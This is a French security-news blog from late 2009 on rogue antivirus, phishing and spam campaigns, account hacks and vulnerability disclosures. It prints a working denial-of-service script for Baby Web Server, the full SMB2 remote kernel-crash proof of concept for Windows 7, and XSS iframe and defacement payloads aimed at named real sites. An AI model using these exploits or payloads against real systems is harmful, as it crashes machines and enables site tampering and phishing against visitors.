Après nos amis roumains, voici le tour des argentins!
Le site argentin de NVidia a une faille de type XSS sur un de ses pages : NVidia's Widget.
La page /content/widgets/widget_home.asp permet d'injection du code au travers du choix de la langue ?lang=la. Il suffit dans ce cas-ci de remplacer 'la' par un petit script et voila!
J'ai été un peu mauvaise langue en parlant uniquement des argentins, car les versions du site chinoise, mexicaine, brésilienne, japonaise, colombienne, chilienne sont également faillite. En cause toujours cette page "Widget".
NVidia.com vulnérable aux XSS
lundi 30 novembre 2009
Rogue : RESpyWare, petit frère de ReAnti
Il y a tout juste 4 jours je vous parlais d'un nouveau faux-antivirus de la famille des Winiguard, ReAnti.
Aujourd'hui c'est un de ses petit frère (et surement pas le dernier) qui va tenir la Une : RESpyWare.
Rien de neuf par rapport à ses prédécesseurs. Une fois installé (volontairement par un utilisateur trompé, ou par infection), il installe un certain nombre de malwares qu'il détectera ensuite lors de son scan. Pour vous désinfecter, il demandera l'achat d'une licence.
Ce logiciel est dangereux en plus d'être inutile : il ne détectera pas de malware sur votre machine, sauf ceux qu'il a lui même installé!
Si vous doutez d'un anti-malware, rendez vous sur la Gallerie Lavasoft des Rogues, qui recense tous les nouveaux usurpateurs.
Vulnérabilité XSS pour l'agence roulaine du développement régional
dimanche 29 novembre 2009
Dans le post précédent sur le piratage de la police roumaine, je concluais par "à qui le tour?". Cette fois ci c'est à l'agence pour le développement de la région Nord-Est de Roumanie de passer à la casserole.
Une faille XSS toute bête présente dans la barre de recherche, qui permet de faire un peu tout ce que l'on veut (alerte, iframe, ...) :
Egalement possible une injection iframe ("><iframe src="http://news-of-security.blogspot.com"></iframe>) ou des actions sur le code HTML même de la page (">document.body.inner.HTML="<<style>body{visibility:hidden; background: black;}<</style><<div style="visibility:visible;><<br><<h1><<font color="red">Salut les Zouzous<</h1><</font><<br>)
Du classique, du simple, mais qui peut très vite amener à des actions de phishing (entre autre) sur le partenaire de l'agence.
Le site de la police roumaine piraté
Décidément très actif cette semaine les roumains. Après Symantec qui a été piraté, c'est au tour du mot de passe administrateur de la base SQL du site de la police roumaine.
Grâce à des erreurs SQL un peu trop bavardes, le pirate (NeOh) a réussis à faire parler le site :
Le host
Les bases de données
et le mot de passe admin
A qui le tour maintenant?
L'accident de voiture de Tiger Woods exploité
samedi 28 novembre 2009
Le célèbre golfeur Tiger Woods a eu un accident de voiture vendredi 27 novembre. Dans un état grave, la nouvelle a traversé le web ... il aurait même été déclaré mort sur Wikipédia (information retirée).
Face à un événement de cette ampleur, des pirates ont mis en place des pages internet très bien référencées sur les mots clés tournant atours de l'accident de la star.
Voici un exemple. Sur la recherche "tiger woods car accident" nous tombons très vite sur cette page :
Si nous cliquons sur le lien vers la vidéo, changement de site, et c'est alors un lecteur vidéo, sans nom, qui s'affiche :
Bizarre, bizarre, car si l'on survole le "lecter vidéo, nous voyons dans la barre de lien en bas de la fenêtre que c'est en réalité un lien vers un exécutable. Doutes confirmés lors de l'inspection du code source :
Il ne s'agit pas d'un lecteur vidéo, mais d'une simple image avec un lien pointant vers un fichier malveillant.
Si ces pages sont si bien référencées sur la recherche Tiger Woods, c'est qu'elle étaient déjà utilisé pour appater les fans de détails people. En effet le couple Woods/Uchitel battrait de l'aile, c'est pourquoi la vidéo porte le nom "Tiger Woods Rachel Uchitel" et que l'allusion à l'accident de voiture n'est qu'en commentaire.
Les joueurs de World of Warcraft sont tous de tristes célibataires masculins
Une vision caricaturale, mais qui montre bien le point de vue des spammers. Dans un récente campagne, des joueurs du célèbre MMORPG, Worl of Warcraft, ont pu recevoir dans leurs boites au lettres un mail intitulé "Do you like to find a girlfriend like me ?" (Aimerais tu trouver une petite amie comme moi?). Le corps du message est celui-ci :
En pièce jointe, on trouve une archive my photos.rar. Un échantillon :Wish to have a boyfriend
Be able to protect me, take care of me
Intolerable lonely night and would like to have your care.
do you Willing ?This is my photos.
Difficile de résister aux arguments de la demoiselle, on est alors tenté d'ouvrir les autres images contenues dans des dossiers aux noms évocateurs : my vagina, my vulva photo, ... charmant!Toutes les photos présentes dans l'archive rar sont des vraies, en totalement innofensives. Le but est de pousser le joueur à lancer une des vidéos également présentes : My video (bathing–Masturbation )I would like to find a boyfriend for make love.exe ou My video (urination–Masturbation)I would like to find a boyfriend for make love.exe .
L'extension *.exe devrait déjà mettre la puce à l'oreille de la victime. En effet derrière ces noms très aguicheurs se cache un voleur de mot de passe WoW.
Alors les joueurs de WoW ... des célibataires esseulés?
Source : sophos.com
De faux avertissements ToS sur youtube
vendredi 27 novembre 2009
Vous vaquez comme souvent sur youtube, regardant de tout et de rien. Puis après avoir regarder quelques prises de catch spectaculaire, vous cliquez sur une "video related" titré "Ortiz vs. Griffin - UFC". Pas de bol, un message rappelant les Terms of Service de Youtube apparait :
Le message vous annonce que la vidéo que vous tentez de visualiser est la propriété exclusive de la chaine américaine ABC. Pour la voir il suffit de s'enregistrer sur le site watchcharma2009.tk.
Si vous vous rendez sur l'URL donné, vous êtes redirigé vers satellitedirect.tv.
Pour le moment se genre de pratique est relativement rare, et les comptes utilisateurs ayant postés ce genre de vidéos sont très vite bannis par Youtube. Mais on pouraait très bien voir ce type de pratique se généraliser, à la manière des groupes "savoir qui regarde ton profil" sur Facebook, oùil faudrait soit disant se rendre sur un autre site et cliquer sur des pubs afin de débloquer la vidéo sous Youtube.
Rogue : ReAnti, un nouveau Winiguard
jeudi 26 novembre 2009
Alors que vous suspectiez un logiciel espion comme étant hôte de votre machine, peut-être avez vous été victime des beaux yeux de Winiguard. Ce faux logiciel anti-espion mais vrai malware en a fait suer plus d'un.
Aujourd'hui la gamme de Winisoft s'agrandis avec l'arrivée de ReAnti.
Interface pro, scan très performant (puisqu'il trouve 714 éléments infectés alors que mon antivirus ne voit rien ...), il a toute les qualité pour venir compléter notre arsenal d'antivirus-spyware en tout genre.
La firme lavasoft met en garde les internautes, et rappelle avoir déjà classifier cette menace sous le nom Win32.FraudTool.REAnti et Win32.FraudTool.WiniGuard
Dans la hôte du père noël? Des virus!
This morning while triaging customer malware and spam samples I saw a variation on the typical click-the-link and get malware spam.
This one was Christmas themed, normally we would expect Thanksgiving themed spam before the Christmas glut.
The spam has a subject of “HO HO HO Santa has the best offer of the year for you” and contents of :
Finis les citrouilles d'Halloween, Thanksgiving à la trappe, les bad guys du net sont déjà sur Noël, les cadeaux, ... Un spam titré “HO HO HO Santa has the best offer of the year for you” (Ho Ho Ho le Père Noël à la meilleur affaire de l'année pour vous) a été détecté par les éditeurs de logiciels de sécurité :
Alors ils ont fait ça bien : code de validation, date buttoire, ... enfin si vous cliquez sur "la bonne affaire", vous aurez en retour un petit executable (santaclause.exe) qui n'est rien d'autre qu'un petit spuware qui se logera dans le dossier temporaire de Windows.HO HO HO Santa has the best offer of the year for you
Hello, it’s me Santa Clause, I suppose you already know me, I have for you the most wanted offer of the year.
If you make an account on:
http://xxxx.xxx
until the 5th December, you can choose one welcome gift from us for 50 Euros
from http://xxxx.xxx
and enter your validation code, which is: a91-valets-cloud-mad
(Only until the 5th December availible.)
This is our way to say Happy Holidays,take your chance to feel the Christmas Anticipation
.
Regards,
Santa Clause
Google Mystery : amusant, mais potentiellement dangereux
Google Mystery est un concept original : tapez une recherche dans la barre (au graphique très proche de google) et vous aurez le résultat de la recherche faite par la personne juste avant vous. Concept génial, on s'amuse alors à taper une recherche afin de voir ce qu'il y avait avant nous ... et souvent, c'est ça :
Du spam! Et oui, il faut y penser, mais ce Google mystery peut vite devenir un outils formidable pour tous les bidouilleurs de la planète.
Black SEO
Un webmaster ou bloggeur peu scrupuleux pourrait créer un script bombardant de requête "recherche" Google Mystery. Ainsi en recherchant disons 100 fois à la minute news-of-security.blogspot.com, je pourrais très bien recevoir un trafic assez conséquent que se soit en recherche "classique" ou via le bouton "J'ai de la chance".
Malware Spreading
Exactement de la même manière que pour la Black SEO, un pirate pourrait utiliser le même genre de script pour mettre en avant un de ses sites malicieux : phishing, fichiers vérolés, faux antivirus, ... tout est alors envisageable!
Voici encore un exemple de détournement réalisable d'une application inoffensive en une machine à véroler.
Une star de la NFL voit son Twitter piraté
mardi 24 novembre 2009
A 24 ans, David Clowney est une star montante du football américain ... mais n'en garde pas moins des goûts des gens de son âge. Ainsi on peut le suivre sur la plate-forme de micro-blogging, Twitter.
Sauf que depuis son compte, certains de ses abonnés ont reçu par Direct Message des insultes, comme sur cette capture :
Pour le moment aucune information trouvée quand à la méthode utilisé par le hacker, mais il serait bon pour David de changer son mot de passe Twitter, mais aussi ceux de ses comtpes associés (ou tout autre compte si comme 50% des gens il utilise le même mot de passe pour tout). Un petit passage de son ordinateur à l'antivirus et antimalware ne ferait pas de mal : on a beau avoir le mot de passe le plus ardu qu'il soit, si un stealer ou trojan est sur notre PC, rien n'y changera!
La star du football américain est au courant de la piraterie et s'est excusé à ses fans.
Symantec piraté
C'est le cordonnier le moins bien chaussé? Toujours est-il que cela n'évite pas un accident de semelle.
Un hacker roumain a en effet réussis à piraté le site de l'éditeur de logigiel de sécurité Symantec. Pour arriver à ses fins, il a utilisé des injections Blind SQL :
"Une injection SQL aveugle n'est pas aussi spectaculaire qu'une injection SQL standart, dans le sens où l'erreur (le résultat de l'injection) n'apparait pas sur le site. C'est basé sur le concept de vrai ou faux. Quand "je pose une question" au serveur (and 1=1 dans notre cas), et que nous répondons correctement, la page se chargera."
Pour mettre à jour ces vulnérabilités, il a utilisé deux outils de sécurité :
- Pangolin (télécharger)
- sqlmap (télécharger)
Il a ainsi pu déterminer la version des serveurs, et avoir accès aux disques durs.
... et donc aux bases de données Norton, One Care, Oasis, ...
Février dernier, le même hacker avait accédé aux serveurs de Kaspersky, toujours par SQL.
Attaque virale via PDF
samedi 21 novembre 2009
Vous recevez un mail d'un de vos ami, avec en pièce jointe un fichier PDF du nom de “U.S. ship thwarts second pirate attack November 18, 2009" (Les navires US contrarient une attaque de pirate le 18 Novembre 2009). Journaliste, bloggeur ou simple curieux, pour un peu que l'anglais soit notre tasse de thé (sans mauvais jeu de mot!) on est tenté de lire le fameux récit ... en plus le fichier n'est pas un exécutable, donc aucun risque! non?
Sauf que le PDF est l'une des méthodes les plus fourbes pour diffuer un malware. Si la curiosité prend le pas sur votre prudence et que malheureusement vous ouvrez ce fichier ... et bien le fichier s'ouvrira! Un PDF du nom de Adobe.pdf se lancera, et vous pourrez lire cet article.
Mais pendant que vous lisez cette histoire bien réelle de pirates, de navires sabordés, ... un requin en profite pour s'attaquer à votre machine. Deux vulnérabilité Adobe sont utilisées (CVE-2007-5659 et CVE-2009-0927), et deux variantes de ProcKill-EM sont placées dans vos fichiers Windows, habituellement C:\Windows\system32.
Donc si vous recevez un PDF d'une personne que vous ne connaissez pas, jetez le mail. En revanche si vous connaissez l'envoyeur, scanner tout de même le fichier (la confiance n'exclue pas le contrôle) et si une infection est avérée vous pouvez prévenir votre vis-à-vis que son PC est utilisé pour des actions malicieuses.
Rapport 2009 de McAfee sur le cybercrime
vendredi 20 novembre 2009
McAfee a sorti sont 5ième rapport annuel sur la criminalité numérique.
Ce rapport met en évidence :
- les cyber attaques et pénétration réseaux qui semblent être reliées à des motivations nationales ou politiques.
- frontière entre guerre électronique et piratage
- le cybercrime et les entreprises privées (sécurité du SI, vulnérabilités, ...)
Télécharger ce rapport : Ressources McAfee
Koobface s'attaque à Skype
Après Google Reader, Koobface continue sa diversification et consolide ses fonctions d'imitation du comportement humain.
Tout d'abord il collecte sur Skype, à partir du terminal compromis, des informations utilisateurs comme ses numéros de téléphones portables, ou fixes, son adresse, sa date d'anniversaire, ses noms et prénom, ... tout cela est ensuite stocké dans une archive rar qui est envoyé par mail ou FTP sur un serveur distant.
C'est là que les choses sérieuses commencent. Le ver se connecte à Skype avec le compte de l'utilisateur infecté, et commence à dialoguer avec ses amis. 18 langues disponibles, une étude lexical étant trop complexe pour un chat multilingue, le ver se contente de balancer au hasard des phrases pré-enregistrées.
Au bout d'un moment - comme pour google Reader, Twitter et autre - le ver balance dans la conversation le lien vers le site frauduleux.
Les MAJ de Koobface sont très fréquentes ses derniers temps, et on on peut dire que les développeurs du malware sont très prévoyant. En effet ils ont d'ors et déjà programmé la bestiole à récupérer des informations sur blogger, wikipédia, yahoo, ...
A quand des articles dans nos wiki avec des liens pointant vers des sites vérolés?
Faille DOS dans Baby Web Server (0 day)
jeudi 19 novembre 2009
Baby Web Server a été créé dans le but de concurrencer l'IIS de Microsoft. Une faille 0 day circule actuellement; permmettant de réaliser un Déni de Service.
#Baby Web Server 2.7.2 Vulnerbility found Denial of Service(0day)
#
#!/usr/bin/env python
#Author:Asheesh Kumar Mani Tripathi
#Created:Asheesh Kumar Mani Tripathi
import socket
print "************************************************* ***"
print "Baby Web Server 2.7.2 Vulnerbility found Denial of Service"
print "Change IP to Victim Server s.connect((127.0.0.1,80))"
print "Author: Asheesh Kumar Mani Tripathi"
print "Reason for DOS attack The Problem lies server"
print "unable to handle so much of requests "
print "************************************************* ****"
host = "127.0.0.1"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect(("127.0.0.1",80))
for i in range (1,1100):
request = "GET /some.txt HTTP/1.1 \n\n"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
print i
except:
print "Oh! Some Problem Occured Check Server is Running or Not"
Lien de téléchargement : packetstormsecurity.org
En savoir plus sur l'auteur : Asheesh Kumar Mani Tripathi (Indian Institute of Information Technology)
Les malwares se payent Adsense
Vous venez d'attraper un virus, un ver, enfin une bestiole qui vous échappe. Vous vous rendez donc sur google, et cherchez quelque chose pour vous retirer cette épine du pied. Malware removal, SpyDoctor, vous téléchargez les 5 premiers résultats vous offrant des armes gratuites. Et pourquoi pas celle aussi dans le carré commercial de droite?
100% free, ça ne peut pas faire de mal! Sauf que si vous téléchargez un de ces logiciels, ils vous feront plus de dégâts que de bien. C'est ce que l'on appelle un scareware (ou logiciel de peur), et une campagne de spreading de ce type de logiciel est en cours sur Google Adsense. Les sites impliqués sont très bien placés sur les mots clés dans le champ sémantique de malware. Une campagne de Black SEO a également été amorcé.
Les sites sur lesquels vous atterrissez font très pros, et dans l'adresse, et dans le graphique. Prenons le cas du website adwarealert (75.125.200.226) :
1 - Des symtômes très pertinents
2 - Un petit logo CNN ...
3 - ... ou Microsoft pour mettre en confiance...
4 - ...et si en plus c'est le leader, alors là!
Comment reconnaitre ce genre de site?
- Tout d'abord ses "logos de confiances" (CNN, Microsoft, mais aussi Visa, Gouvernement, ...) sont non cliquables. Il n'y a donc aucun moyen de vérifiez la source.
- En général ils proposent des scans antivirus en ligne. Ce type de service existe, mais veuillez préférer les sites d'antivirus connus (Trend Micro, McAfee, Kaspersky, ESET...).
Afin d'éviter de ce faire avoir par ce genre de logiciel, il est recommandé de ne télécharger que des logiciels de confiance, sur des sites de confiance. N'allez pas vous procurer une version gratuite d'un antivirus sur un site du genre logiciel-gratuit.com . Virustotal tient une liste des antivirus et antimalware légitime. Il permet également d'analyser un fichier en ligne par tous ces logiciels de sécurité légitimes.
Rogue : attention à Twilight et Leonid
mercredi 18 novembre 2009
Leonid est une pluie très intense de météorite. Le pic d'étoiles filantes se déroulait hier (près de 500/h). Depuis quelques jours, beaucoup d'amateur ou de simples curieux souhaitaient connaitre l'heure du pic de la pluie ... ce qui donna bien des idées aux pirates.
Ainsi une action de Black SEO sur les termes de recherche "leonids meteor shower" pouvait conduire l'internaute sur une page contenant un faux scan antivirus. Ensuite le téléchargement d'un antivirus résidant est proposé :
Capture Trend Micro
Toujours une histoire d'étoile et de constellation, New Moon (2ième volet de la saga Twilight) a été diffusé en avant-première Lundi à Los Angeles. Ceux qui ne pouvait se déplacer ont du vouloir chercher des moyens de voir en streaming l'événement. Ainsi "New Moon live stream" a été utilisé pour diffusé le même trojan que pour Leonid.
Le ministère de l'intérieur pakistanais piraté
mardi 17 novembre 2009
Le site du ministre de l'intérieur pakistanais, Rehman Malik, a été piraté par des hacktivistes. Lorsque l'on souhaitait accéder à la page d'accueil, un message apparaissait : “Fu*k Of U Losers..We Dont Need Such Ministers”. Une traduction ne semble pas nécéssaire...
Cyber-Spy & ShakaZz revendiquent cette action. Ils font tous les deux partie de la Team pakistanaise Pakhaxors.
Pour la petite histoire, Cyber-Spy avait à l'origine defacé le site tout seul, puis ShakaZz vint y apporter son coup de patte ... ce qui n'est pas vraiment du gout du premier. Des comptes snot en train de se régler dans la Team.
L'administrateur du site du ministre de l'intérieur a réglé le problème.
Vulnérabilité Flash : un vecteur d'attaque dévastateur
vendredi 13 novembre 2009
Une faille de sécurité non patchée impliquant Adobe Flash permet à une personne malveillante de charger des Exploits dans des sites (via un mail par exemple).
C'est le groupe de chercheur Foreground qui est à la base de cette découverte. Ils ont prévenu Adobe de la vulnérabilité, mais également Google, dont la plupart des applications sont vulnérables (Gmail par exemple).
Pour prouver leurs dires, les chercheurs ont réalisé une vidéo Proof Of Concept de l'exploitation de la faille sur Gmail (désormais comblée). La vidéo est visible sur Youtube :
Cette menace est loin de se limiter à Flash, et peut aussi englober d'autres formes de contenu actif tel Javascript ou Silverlight. Tous les sites avec de tels langages dans leurs pages sont potentiellement vulnérables, donc tous les internautes sont des cibles potentielles!
Faille dans Gimp 2.6.7
Dans un rapport de recherche diffusé le 12 novembre par Secunia, nous apprenons qu'il existe une vulnérabilité de type buffer overflow. Cette faille peut être exécute à distance, et permet à un attaquant de balancer du code arbitraire.
Pour se faire, il faut utiliser une image BMP spécialement forgé dans la fonction ReadImage() du plugin plug-ins/file-bmp/bmp-read.c. L'attaquant peut alors à distance exécuter à distance du code arbitraire à partir de la session utilisateur.
Cette version de Gimp est la dernière, daté du 14 aout 2009, mais rien ne dit que d'autres versions ne sont pas vulnérable. Les développeurs ont été prévenu du problème.
Spam : Attention aux Tests de QI !
Des pirates utilisent des comptes Twitter ou Facebook afin de diffuser l'adresse de site internet qui collecte des données sur vous. Et plutôt que de vous demander de but en blanc votre numéro de téléphone, votre adresse mail, ils usent bien entendu de stratagèmes de mise en confiance. Et parmi les valeurs montantes se trouvent les tests de QI en ligne.
Tout commence à partir du compte d'un réseau social compromis - dont les deux principaux sont Facebook et Twitter. Le pirate spamme ses contacts par message privé, avec un message du type :
Les liens redirigent vers divers sites, dont un du nom de IQ ME, qui fournit une dizaine de questions censées calculer votre quotient intellectuel.
Tout commence bien :
Belle présentation, question typiques de test de QI, et quelques minutes plus tard, vous avez enfin fini, vous voulez flatter votre égo avec un score supérieur à 130, mais :
Discrètement on vous demande votre numéro de téléphone pour recevoir votre résultat. Cela peut sembler sans danger, mais donner des informations personnelles (portable, mail ou adresse) à n'importe qui peut ensuite entrainer des effets indésirables.
Demandez vous : pourquoi veulent-ils cette informations. Dans ce cas-ci, le risque de rentrer dans une liste de spam par SMS parait fort probable.
Restez donc très prudent si un contact (même de confiance) vous propose de participer à ce genre de tests. De plus dans certains cas des retraits mensuels pourraient être effectués pour ce service...lisez bien les petites lignes!
Phishing Free.fr qualitylingerie.net
Personne n'est épargné par les tentatives de phishing. Il nous échappe surement des centaines de cas chaque jour, mais quand on peut aider...
Cher(ere) xxxxxxx@xxxxx.xxx ,
Merci de lire attentivement ce courrier. Il contient des informations essentielles,
destinees a faciliter l'utilisation de votre compte Freebox et le recours a ses differents services.
Avez-vous recemment modifier votre banque, votre numero de telephone ou de carte de credit?
Pour vous assurer que votre service ne soit pas interrompu,
veuillez mettre a jour vos informations de facturation en cliquant ci-dessous aujourd'hui.
-----------------------------------------------------------
http://www.qualitylingerie.net/images/www.free.fr/index.htxxxetcetc
-----------------------------------------------------------
Si vous avez recemment mis a jour vos informations de facturation,
veuillez ne pas tenir compte de ce message que nous traitons les modifications que vous avez apportees.
L'equipe Freebox
===========================================================
===========================================================
(c) 2009 Free ADSL Freebox
Un message plutôt de qualité si 3 détails ne choquaient pas :
- le message a été envoyé sur une boîte gmail
- l'URL qualitylingerie.net est très très très douteuse...
- tout autant que l'adresse mail source alert@free.fr
Comme souvent les spammers ont mis plus d'énergie dans la finition de la page de phishing que dans le mail :
Le site hébergeant cette page frauduleuse est une vitrine de boutique Ebay spécialisée dans la lingerie. Le site, hébergé en Amérique du Nord, a vraisemblablement été piraté.
Certains navigateurs web bloquent d'ors et déjà cette page, mais prudence reste de mise.
Le Twitter de Britney Spear hacké
jeudi 12 novembre 2009
Des pirates ont mis la main sur le compte Twitter de la star Britney Spears. Les visiteurs ont laissé un message au passage, laissant entendre que la Pop star dérangée aurait vendu son âme au diable et attend avec impatience son arrivée sur terre.
La méthode employée est encore floue, mais cela montre qu'il est plus facile de pirater le compte d'une star que de créer un compte en voulant se faire passer pour elle. Ce cas de piratage est au moins le troisième visant la célébrité sur Twitter. En janvier dernier par exemple on pouvait lire dans ses updates que son vagin faisait 4 pieds de long et était orné de dent de requin, et en juin un tweet annonçait la mort de la chanteuse.
La découverte de cette nouvelle entrée par effraction sur le compte de Britney a été noté en premier par le chercheur de chez Trend Micro, Rik Ferguson. Et il en rit : "J'ai d'abord cru quelle pensait envoyer un Message Privée".
Phishing Steam steampowared.tk
Un nouveau site de phishing visant les utilisateurs de steam vient de voir le jour.
La charte graphique est quasiment identique à l'original.
L'original :
et la version malicieuse :
Le site est hébergé aux Pays-Bas, et l'extension est fournis gratuitement par tahola.tk
Le but de cette page est de confondre un utilisateur lambda, de lui soutirer son nom d'utilisateur et son mot de passe afin par la suite de prendre le contrôle de son compte.
Sur les "marchés noirs", un compte steam basic (half life +counterstrike) peut se vendre quelques dollars.
Spam : l'astuce DNS du mois
Les créateurs de Botnets et les spammers sont toujours à la recherche du bon tuyau qui leur permettra de brouiller les anti-spam et anti-virus.
La toute dernière technique permet de contrecarrer les techniques d'inspections de liens mises en place par les anti-spam. Le filtrage par inspection de lien fonctionne de la manière suivante :
- un mail arrive dans une boite protégé par un anti-spam
- l'A-S scanne sont contenu
- l'A-S scanne le contenu de la page web en lien, ou compare le lien à base base de données de réputation de nom de domaine
- l'A-S fait de choix de bloquer ou laisser passer le mail
Pour un spammer, il est donc très important de pouvoir surpasser ces vérifications.
Donc certains ont eu une idée, que l'on pourrait qualifier de génial (machiavélique?). Cela consiste à contrôler temporellement la destination du lien, en changeant le pointage au moment critique. Ainsi ils brouillent les A-S, qui scanne une webpage alors inoffensive, puis change le pointage du site vers un site malicieux (malware spreading, phishing, ...) avant que l'utilisateur ne lise le mail.
L'idée est bonne, tout autant que la technique employée.
Pour arriver à leur fin, les spammers manipulent avec un timing parfait le DNS. Ils suivent la procédure suivante :
- envoi du spam durant la nuit (fuseau horaire de la cible)
- ils font en sorte que la résolution DNS du lien présent dans le spam corresponde à un site bénin (ou un HTTP 404)
- une fois le spam délivré aux cibles, ils switchent le DNS vers le site malicieux
Le changement de DNS doit s'effectuer avant que la victime ne lise ses mails, mais après l'inspection de l'anti-spam! Il faut donc aux pirates une précision d'horloger.
Cette méthode permet ainsi de troubler les filtres anti-spam qui utilise l'inspection de lien bêtement. N'oublions pas que face à ces logiciels se trouvent des humains, experts dans leur domaine : le spammer aura toujours un temps d'avance sur la protection.
L'API Twitter génère des noms de domaine malicieux
Une commande Twitter très populaire a été utilisé par des hackers afin de dissimuler des actes malveillants.
L'API Twitter met à disposition des éditeurs d'applications légitimes les hashtags les plus populaires. Ce type d'information, nous l'avons vu avec Mad Men ou Sesame Street, intéresse au plus au point les pirates, afin de pouvoir cibler leur spam. Et comme sur la plate-forme de micro-blogging, les modes évolues très vite, il était important pour les hackers d'avoir un moyen de suivre ces changements d'humeur...mais il peut également servir à générer automatiquement des noms de domaines, qui contiendront ensuite des malwares.
D'après le chercheur Denis Sinegubko, cela permettrait d'obscurcir le fonctionnement des scripts incorporés dans des sites compromis. Ces scripts redirigent la victime vers une page malicieuse contenant un certain nombre d'Exploits non patchées. Twitter dans tout ça? En fait le script utiliserait la seconde lettre d'un sujet à la mode sur Twitter afin de résoudre un mot de passe. Ce mot de passe permet par la suite de déterminer le contenu du nom de domaine vers lequel la victime sera reroutée. Un exemple concret pour éclaircir tout ça : Il y a quelques jours, c'est le mot Jedward (deux irlandais qui participe à X-factor) qui tenait le haut du pavée, que la recette magique transforma en ghoizwvlev.com .
"Afin de rendre la génération du nom du domaine moins prévisible, ils utilisent le code du second caractère de la recherche la plus populaire d'il y a deux jours. De cette manière ils ont un jour pour enregistrer un nouveau nom de domaine, qui sera activé le lendemain." écrit Denis Sinegubko.
Pour cela les pirates utilisent la fonction callback de twitter, dans un code qui ressemble à celui-ci : callback({"trends":{"2009-11-03":[{"name":"Halloween","query":"Halloween"},...]} ,"as_of":1257850226}). Ce code est inséré dans des sites internet piratés, le plus souvent juste avant la balise < /html>.
La génaration de nom de domaine peut paraitre une technique obscure voire futile, mais cela est essentielle dans le processus de diffusion de malware, puisque cela participe au brouillage des scanners de moteur de recherche, d'éditeurs de logiciel de sécurité, qui sont à la recherche de contenu malicieux. Ainsi au lieu de voir un site internet diffusant du contenu malveillant, il verra simplement un petit script utilisant une fonction Twitter largement répandue.
Cette technique démontre une fois de plus la capacité des Black Hat à faire évoluer leur outils, leurs méthodes d'attaques. Denis qualifie même ce script malicieux du "plus créatif [...] qu'il est eu à voir jusque là."
Exploit Windows 7 et Server 2008
mercredi 11 novembre 2009
A peine sorti, voici qu'il existe déjà un Exploit attaquant Windows 7 et Windows Server 2008R2. Le bug engendre une boucle infinie du SMB et permet un Remote Kernel Crash.
Le Proof Of Concept a été rédigé par Laurent Gaffié :
PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#
import SocketServer
packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
class SMB2(SocketServer.BaseRequestHandler):
def handle(self):
print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()
launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()
Ce code permet à une personne malveillante de faire cracher n'importe quelle machine (sur le même LAN ou via Internet Explorer) tournant sur Windows 7 ou Server 2008R2.
Laurent Gaffié annonçait à la sortie de ce remote de nouveaux Exploits...nous attendons avec impatience!
Phishing Apple/MobilMe
MobileMe est un service d'Apple permettant de synchroniser à distance en mode "push" le courrier électronique, les contacts et les événements de calendrier de tous ses appareils (iPhone, Mac, PC, ...). Pour bénéficier de ce service il faudra débourser entre 79 et 119 $ par an...alors forcement quand on est accros à MobilMe on a pas envie de se retrouver sans synchro durant un jour ou deux à cause d'une bête histoire de renouvellement d'abonnement.
Certains utilisateurs ont reçu un mail des derniers jours, les informant que leur compte MobilMe expirait le lendemain :
From: Mobile IDisk [noreply01@me.com] [mailto:noreply01@me.com]
Date: November 8, 2009 5:25:10 PM CST
To: [*****]
Subject: **Your subscription expires tomorrow...*
Welcome,
Just a reminder to renew your MobileMe subscription by November 08,
2009 PDT to avoid interruption of service.
*To renew your service, log in to MobileMe, select Account, and click
Account Options.*Then click the
* Login* box for your subscription. When you're done, click Billing
Info and make sure your credit card information is up to date. It
takes only a few minutes, and your credit card won't be charged until
the day before your renewal date.
Thanks for being a MobileMe subscriber. We're looking forward to
another great year. .
http://apple-me.info/ =>Lien malicieux
Copyright 2009 Apple Inc. All rights reserved.
Les utilisateurs était, un fois arrivé sur la page, invités à rentrer leurs infos Apple et bancaires. Le site apple-me.info n'a pas fait long feu, puisque moins de 3 jours après la vague de spam, il était offline.
Faites donc bien attention quand vous vous connectez à un site requirant une identification. Vérifiez notamment les certificats!
Voici la page original du service MobilMe et les informations à regarder afin de vérifier l'authenticité du site.
Mac OSX : 58 failles comblées
Le 9 novembre, Apple a émis un bulletin de sécurité patchant 58 vulnérabilités affectant son système Mac OS X.
Les mises à jour de sécurité concernent :
- Mac OS X Server 10.4, 10.5, 10.6
- Mac OS X 10.4, 10.5, 10.6,
- AirPort (accès à internet sans fil)
- Apple TV
- l'iPhone et l'iPod Touch
- les logiciels iPhoto, QuickTime 7 et Safari
ainsi que bien entendu les produits relatifs à la sécurité.
Si la plupart venait de vulnérabilité causé par Adobe Flash ou Java, certaines touchant le système de gestion domaine (DNS). Les serveurs tournant avec les versions de 10.4 à 10.6 de Mac OSX Server étaient vulnérables à des mises à jour malicieuses, ce qui permettait les empoisonnement du cache.
J'espère que cette mise à jour de sécurité montrera à certains utilisateurs qu'il y a bien des bugs et vulnérabilité sur Mac...et la mode tendant plus vers la firme de Steve Jobs, les pirates trouveront la pomme toujours plus attirante.
